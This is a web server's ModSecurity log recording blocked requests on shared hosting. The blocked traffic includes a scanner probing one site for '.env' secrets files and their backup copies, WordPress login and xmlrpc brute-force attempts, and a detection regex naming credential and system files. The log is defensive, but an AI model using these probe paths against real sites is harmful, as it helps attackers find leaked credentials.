[Tue May 26 16:56:10.244282 2026] [security2:error] [pid 839808:tid 839971] [client 138.229.100.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDUpqtwAfohijxAqhZoAAAASk"], referer: https://anujtradingco.com
[Tue May 26 16:56:11.174675 2026] [security2:error] [pid 839808:tid 840020] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDUpqtwAfohijxAqhZowAAAVo"]
[Tue May 26 16:56:11.455291 2026] [security2:error] [pid 839808:tid 839900] [remote 5.45.96.74:56462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWDU5qtwAfohijxAqhZsgABUVk"]
[Tue May 26 16:56:13.756560 2026] [security2:error] [pid 839808:tid 839998] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDVJqtwAfohijxAqhZ1gAAAUQ"]
[Tue May 26 16:56:14.940115 2026] [security2:error] [pid 839808:tid 839891] [remote 103.91.67.202:39032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWDVpqtwAfohijxAqhZ-gABGlA"]
[Tue May 26 16:56:15.860920 2026] [security2:error] [pid 839808:tid 840010] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDVpqtwAfohijxAqhZ9QAAAVA"]
[Tue May 26 16:56:17.220176 2026] [security2:error] [pid 839808:tid 840038] [client 208.84.100.196:25788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/backend/.env"] [unique_id "ahWDWZqtwAfohijxAqhaNQAAAWw"]
[Tue May 26 16:56:17.224386 2026] [security2:error] [pid 839808:tid 840046] [client 208.84.100.196:25778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/api/.env"] [unique_id "ahWDWZqtwAfohijxAqhaPAAAAXQ"]
[Tue May 26 16:56:17.231179 2026] [security2:error] [pid 839808:tid 840027] [client 208.84.100.196:25770] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/app/.env"] [unique_id "ahWDWZqtwAfohijxAqhaQgAAAWE"]
[Tue May 26 16:56:17.236523 2026] [security2:error] [pid 839808:tid 839990] [client 208.84.100.196:25736] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env"] [unique_id "ahWDWZqtwAfohijxAqhaPgAAATw"]
[Tue May 26 16:56:17.640671 2026] [security2:error] [pid 839808:tid 839942] [client 117.198.37.168:64710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDWZqtwAfohijxAqhaSwAAAQw"]
[Tue May 26 16:56:17.640793 2026] [security2:error] [pid 839808:tid 839942] [client 117.198.37.168:64710] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDWZqtwAfohijxAqhaSwAAAQw"]
[Tue May 26 16:56:18.352536 2026] [security2:error] [pid 839808:tid 840013] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDWJqtwAfohijxAqhaEgAAAVM"]
[Tue May 26 16:56:18.979684 2026] [core:crit] [pid 839808:tid 839965] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:56:19.079970 2026] [security2:error] [pid 839808:tid 840061] [client 208.84.100.196:25846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.production.copy"] [unique_id "ahWDW5qtwAfohijxAqhacQAAAYM"]
[Tue May 26 16:56:20.177717 2026] [security2:error] [pid 839808:tid 840036] [client 208.84.100.196:25800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.production.swp"] [unique_id "ahWDXJqtwAfohijxAqhaewAAAWo"]
[Tue May 26 16:56:20.843155 2026] [security2:error] [pid 839808:tid 839955] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDWpqtwAfohijxAqhaaAAAARk"]
[Tue May 26 16:56:21.286703 2026] [security2:error] [pid 839808:tid 839992] [client 208.84.100.196:39844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.old"] [unique_id "ahWDXZqtwAfohijxAqhakgAAAT4"]
[Tue May 26 16:56:21.286783 2026] [security2:error] [pid 839808:tid 839961] [client 208.84.100.196:39708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env~"] [unique_id "ahWDXZqtwAfohijxAqhakwAAAR8"]
[Tue May 26 16:56:21.287302 2026] [security2:error] [pid 839808:tid 840064] [client 208.84.100.196:39680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.production.orig"] [unique_id "ahWDXZqtwAfohijxAqhalwAAAYY"]
[Tue May 26 16:56:21.287681 2026] [security2:error] [pid 839808:tid 840037] [client 208.84.100.196:39810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.production.old"] [unique_id "ahWDXZqtwAfohijxAqhamAAAAWs"]
[Tue May 26 16:56:21.287727 2026] [security2:error] [pid 839808:tid 840004] [client 208.84.100.196:39834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.production~"] [unique_id "ahWDXZqtwAfohijxAqhalgAAAUo"]
[Tue May 26 16:56:21.290175 2026] [security2:error] [pid 839808:tid 840042] [client 208.84.100.196:39774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.local~"] [unique_id "ahWDXZqtwAfohijxAqhanQAAAXA"]
[Tue May 26 16:56:21.290180 2026] [security2:error] [pid 839808:tid 840034] [client 208.84.100.196:39802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.production.bak"] [unique_id "ahWDXZqtwAfohijxAqhamwAAAWg"]
[Tue May 26 16:56:21.290365 2026] [security2:error] [pid 839808:tid 839975] [client 208.84.100.196:39800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.local.copy"] [unique_id "ahWDXZqtwAfohijxAqhanAAAAS0"]
[Tue May 26 16:56:21.291310 2026] [security2:error] [pid 839808:tid 839956] [client 208.84.100.196:39758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.local.backup"] [unique_id "ahWDXZqtwAfohijxAqhaoQAAARo"]
[Tue May 26 16:56:21.291401 2026] [security2:error] [pid 839808:tid 840015] [client 208.84.100.196:39724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.swp"] [unique_id "ahWDXZqtwAfohijxAqhaogAAAVU"]
[Tue May 26 16:56:21.291485 2026] [security2:error] [pid 839808:tid 840028] [client 208.84.100.196:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.local.orig"] [unique_id "ahWDXZqtwAfohijxAqhamgAAAWI"]
[Tue May 26 16:56:21.291502 2026] [security2:error] [pid 839808:tid 840033] [client 208.84.100.196:39738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.copy"] [unique_id "ahWDXZqtwAfohijxAqhaowAAAWc"]
[Tue May 26 16:56:21.291830 2026] [security2:error] [pid 839808:tid 840052] [client 208.84.100.196:39752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.local.old"] [unique_id "ahWDXZqtwAfohijxAqhangAAAXo"]
[Tue May 26 16:56:21.291877 2026] [security2:error] [pid 839808:tid 840039] [client 208.84.100.196:39778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.local.swp"] [unique_id "ahWDXZqtwAfohijxAqhaoAAAAW0"]
[Tue May 26 16:56:21.291910 2026] [security2:error] [pid 839808:tid 840024] [client 208.84.100.196:39742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.local.bak"] [unique_id "ahWDXZqtwAfohijxAqhapgAAAV4"]
[Tue May 26 16:56:21.293218 2026] [security2:error] [pid 839808:tid 840045] [client 208.84.100.196:39726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.orig"] [unique_id "ahWDXZqtwAfohijxAqhalQAAAXM"]
[Tue May 26 16:56:21.293347 2026] [security2:error] [pid 839808:tid 840006] [client 208.84.100.196:39824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.production.backup"] [unique_id "ahWDXZqtwAfohijxAqhapQAAAUw"]
[Tue May 26 16:56:21.310047 2026] [security2:error] [pid 839808:tid 839965] [client 208.84.100.196:39690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.backup"] [unique_id "ahWDXZqtwAfohijxAqhapwAAASM"]
[Tue May 26 16:56:21.310792 2026] [security2:error] [pid 839808:tid 839966] [client 208.84.100.196:39678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env.bak"] [unique_id "ahWDXZqtwAfohijxAqhaqQAAASQ"]
[Tue May 26 16:56:21.796323 2026] [security2:error] [pid 839808:tid 839923] [remote 74.7.241.58:47934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWDXZqtwAfohijxAqhatQABeHA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:56:22.673801 2026] [security2:error] [pid 839808:tid 839814] [remote 103.230.156.120:41272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWDXpqtwAfohijxAqhavgABWAM"]
[Tue May 26 16:56:23.009682 2026] [security2:error] [pid 839808:tid 840025] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDXZqtwAfohijxAqhargAAAV8"]
[Tue May 26 16:56:24.041433 2026] [security2:error] [pid 839808:tid 840030] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDXpqtwAfohijxAqhawwAAAWQ"]
[Tue May 26 16:56:24.937735 2026] [autoindex:error] [pid 839808:tid 839985] [client 170.106.181.163:46330] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:56:25.767531 2026] [security2:error] [pid 839808:tid 840041] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDYJqtwAfohijxAqha5gAAAW8"]
[Tue May 26 16:56:26.309381 2026] [security2:error] [pid 839808:tid 840000] [client 74.7.241.138:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.filosha.com.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWDYZqtwAfohijxAqhbAQAAAUY"]
[Tue May 26 16:56:26.310369 2026] [security2:error] [pid 839808:tid 840048] [client 74.7.241.138:38214] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.filosha.com.freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahWDYZqtwAfohijxAqha_wABdgA"]
[Tue May 26 16:56:27.270848 2026] [security2:error] [pid 839808:tid 839976] [client 35.145.49.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDYZqtwAfohijxAqhbDQAAAS4"]
[Tue May 26 16:56:27.842752 2026] [security2:error] [pid 839808:tid 839981] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDYpqtwAfohijxAqhbFwAAATM"]
[Tue May 26 16:56:28.254852 2026] [security2:error] [pid 839808:tid 840063] [client 117.198.37.168:65032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDZJqtwAfohijxAqhbPQAAAYU"]
[Tue May 26 16:56:28.254994 2026] [security2:error] [pid 839808:tid 840063] [client 117.198.37.168:65032] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDZJqtwAfohijxAqhbPQAAAYU"]
[Tue May 26 16:56:29.945508 2026] [security2:error] [pid 839808:tid 840058] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDZJqtwAfohijxAqhbSQAAAYA"]
[Tue May 26 16:56:30.940868 2026] [security2:error] [pid 839808:tid 840032] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDZZqtwAfohijxAqhbZwAAAWY"]
[Tue May 26 16:56:33.088710 2026] [security2:error] [pid 839808:tid 839991] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDZ5qtwAfohijxAqhbhwAAAT0"]
[Tue May 26 16:56:35.279009 2026] [security2:error] [pid 839808:tid 839963] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDaZqtwAfohijxAqhbugAAASE"]
[Tue May 26 16:56:37.349485 2026] [security2:error] [pid 839808:tid 840061] [client 62.60.130.233:54964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dgssi.in"] [uri "/wp-login.php"] [unique_id "ahWDbZqtwAfohijxAqhb9QAAAYM"], referer: https://duckduckgo.com/
[Tue May 26 16:56:37.574517 2026] [security2:error] [pid 839808:tid 840024] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDa5qtwAfohijxAqhb2gAAAV4"]
[Tue May 26 16:56:37.687822 2026] [security2:error] [pid 839808:tid 840014] [client 62.60.130.233:53934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dgssi.in"] [uri "/wp-login.php"] [unique_id "ahWDbZqtwAfohijxAqhb_wAAAVQ"]
[Tue May 26 16:56:38.544961 2026] [security2:error] [pid 839808:tid 839996] [client 117.198.37.168:65355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDbpqtwAfohijxAqhcCQAAAUI"]
[Tue May 26 16:56:38.545077 2026] [security2:error] [pid 839808:tid 839996] [client 117.198.37.168:65355] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDbpqtwAfohijxAqhcCQAAAUI"]
[Tue May 26 16:56:38.914669 2026] [security2:error] [pid 839808:tid 840055] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDbZqtwAfohijxAqhb-AAAAX0"]
